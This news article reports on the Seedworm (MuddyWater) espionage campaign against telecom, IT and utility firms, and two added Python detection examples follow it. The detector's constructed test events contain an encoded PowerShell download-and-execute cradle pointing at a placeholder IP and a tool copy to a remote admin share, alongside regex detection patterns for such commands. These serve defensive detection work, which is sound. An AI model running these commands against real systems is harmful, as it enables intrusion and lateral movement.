Firms from Asia and the Middle East targeted by the Seedworm group

January 27, 2022

Researchers report that the Iranian state-backed espionage group Seedworm (also tracked as MuddyWater) has been targeting telecommunications companies, IT service providers and utility firms in several countries in Asia and the Middle East. According to their investigation, the group has been attacking organisations in these sectors for at least the past six months.

The group is using a combination of malware, legitimate network utilities and spear-phishing to gain access, move between its targets through their supply-chain relationships, and exfiltrate data.

The researchers examined an attack against a telecommunications company in the Middle East last August, in which the attackers created a Windows service to launch an unknown Windows Script File (WSF). The attackers also appear to have used their access to the telco to reach further victims, connecting from it to the Exchange Web Services (EWS) endpoints of other organisations.

The cyber-espionage campaign was also found to be active in multiple organisations in the United Arab Emirates, Saudi Arabia, Jordan, Pakistan, Thailand, Kuwait, Israel and Laos, using legitimate tools, living-off-the-land techniques, social engineering and malware.


Experts believe that Seedworm gains its initial foothold in these networks through stolen credentials and spear-phishing.


In one attack, analysts observed a suspected installer (MSI) for the legitimate ScreenConnect remote-access tool delivered inside a zip archive named ‘Special discount program[.]zip’, which arrived in a spear-phishing email and served as the initial entry point. They also identified two IP addresses used in the campaign that had previously been linked to Seedworm operations, alongside tools such as Password Dumper and SharpChisel.
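The lure above is a zip archive carrying an installer, so a mail gateway or analyst triage script needs to look inside archives rather than at the outer attachment name. The following is an added example, not code from the article or from the researchers: it builds a constructed archive in memory (a fake MSI, a fake WSF like the one mentioned earlier, and a PE renamed to look like an image) and flags members both by extension and by file header, so a payload renamed to a harmless extension is still caught. File names, contents and the `scan_zip`/`classify_member` helpers are all assumptions for this example.

```python
import io
import zipfile

# File-header signatures used for content checks (assumed here, standard values).
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # MSI and legacy Office compound files
MZ_MAGIC = b"MZ"                                  # PE executables (.exe, .dll, .scr)

# Extensions that should not arrive from an outside sender inside an archive.
RISKY_EXTENSIONS = {".msi", ".exe", ".dll", ".scr", ".js", ".jse", ".vbs",
                    ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".lnk"}


def classify_member(name: str, data: bytes) -> list[str]:
    """Return the reasons one archive member looks like an executable payload."""
    reasons = []
    lower = name.lower()
    # Only the final extension matters; "invoice.pdf.msi" is still an MSI.
    ext = "." + lower.rsplit(".", 1)[-1] if "." in lower else ""
    if ext in RISKY_EXTENSIONS:
        reasons.append(f"executable extension {ext}")
    # Content checks catch payloads renamed to a benign-looking extension.
    if data.startswith(OLE_MAGIC):
        reasons.append("OLE compound file header (MSI/Office)")
    if data.startswith(MZ_MAGIC):
        reasons.append("PE header (MZ)")
    if b"<job" in data[:512].lower():
        reasons.append("Windows Script File <job> element")
    return reasons


def scan_zip(blob: bytes) -> dict[str, list[str]]:
    """Map each suspicious member of a zip attachment to the reasons it was flagged."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(4096)  # headers suffice; never extract large members fully
            reasons = classify_member(info.filename, head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_attachment() -> bytes:
    """Constructed test input modelled on the lure archive; none of it is a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Special discount program.msi", OLE_MAGIC + b"\x00" * 64)
        zf.writestr("readme.txt", b"Your discount details are in the installer.\n")
        zf.writestr("launcher.wsf",
                    b'<job id="x"><script language="JScript">WScript.Echo(1)</script></job>')
        zf.writestr("photo.jpg", MZ_MAGIC + b"\x90" * 64)  # PE disguised as an image
    return buf.getvalue()


if __name__ == "__main__":
    for member, why in scan_zip(build_sample_attachment()).items():
        print(f"{member}: {', '.join(why)}")
```

Only the first few kilobytes of each member are read, so the check stays cheap on large archives; a real gateway would additionally reject password-protected archives it cannot inspect.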

The researchers also observed attempted supply-chain attacks, in which the group used its access to compromised service providers to target the larger organisations that rely on them.

In one attack against a utility company in Laos, the attackers gained entry by exploiting a public-facing service; the first compromised machine was an IIS web server.

The attackers then used PowerShell to push malicious scripts and tools across the network, and from there connected to a webmail server belonging to a company in Thailand and to IT servers of an unrelated firm.
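The chain just described (a public-facing IIS server compromised, then PowerShell used to spread tooling) leaves a characteristic trace in process-creation telemetry: the IIS worker process `w3wp.exe` spawning a shell, encoded PowerShell command lines with download cradles, and copies to remote admin shares. The following is an added example, not code from the article or the researchers, that runs those three checks over constructed events in the shape of Sysmon Event ID 1 fields. The events, host names, the `192.0.2.10` address and the helper names are all invented for the example.

```python
import base64
import re

# Parent/child pairs that should essentially never occur on a healthy web server.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "cscript.exe", "wscript.exe",
          "mshta.exe", "certutil.exe", "rundll32.exe"}

# -EncodedCommand and the abbreviations powershell.exe accepts for it.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Common download-and-execute cradles.
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
                       r"|Start-BitsTransfer|Invoke-Expression|\bIEX\b", re.I)
# UNC paths to administrative shares, used to drop tools on other hosts.
ADMIN_SHARE_RE = re.compile(r"\\\\[\w.-]+\\(?:c\$|admin\$|ipc\$)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(ev: dict) -> list[str]:
    """Return the reasons one process-creation event is suspicious (empty if none)."""
    reasons = []
    parent, image = basename(ev["parent"]), basename(ev["image"])
    cmd = ev["cmdline"]
    if parent in WEB_WORKERS and image in SHELLS:
        reasons.append(f"web server worker {parent} spawned {image}")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        cmd = cmd + " " + decoded  # apply the remaining checks to the decoded script too
    if CRADLE_RE.search(cmd):
        reasons.append("download/execute cradle")
    if ADMIN_SHARE_RE.search(cmd):
        reasons.append("write to remote admin share")
    return reasons


def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Run analyse_event over a batch and keep only the events that fired."""
    alerts = []
    for ev in events:
        reasons = analyse_event(ev)
        if reasons:
            alerts.append((ev["host"], reasons))
    return alerts


def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (invented for this example, not from the article).
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a')"
SAMPLE_EVENTS = [
    {"host": "web01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell -nop -w hidden -enc {encode_powershell(CRADLE_TEXT)}"},
    {"host": "web01", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile Copy-Item C:\Windows\Temp\sc.exe \\mail01\c$\Windows\Temp\sc.exe"},
    {"host": "app02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},   # benign admin use
    {"host": "web01", "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Windows\Temp\abc.cmdline"'},  # normal ASP.NET compile
]

if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

The last two sample events are deliberately benign: an administrator running PowerShell from the desktop and IIS compiling an ASP.NET page do not trip any rule, which is the false-positive budget a rule like this has to keep in production.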

Seedworm’s primary objective appears to be intelligence gathering, particularly about telecommunications, although the researchers found little evidence of what the attackers did on victim networks after gaining access. They advise organisations in the affected sectors to strengthen their defences, since preventing the initial intrusion is the most effective way to stop the group.
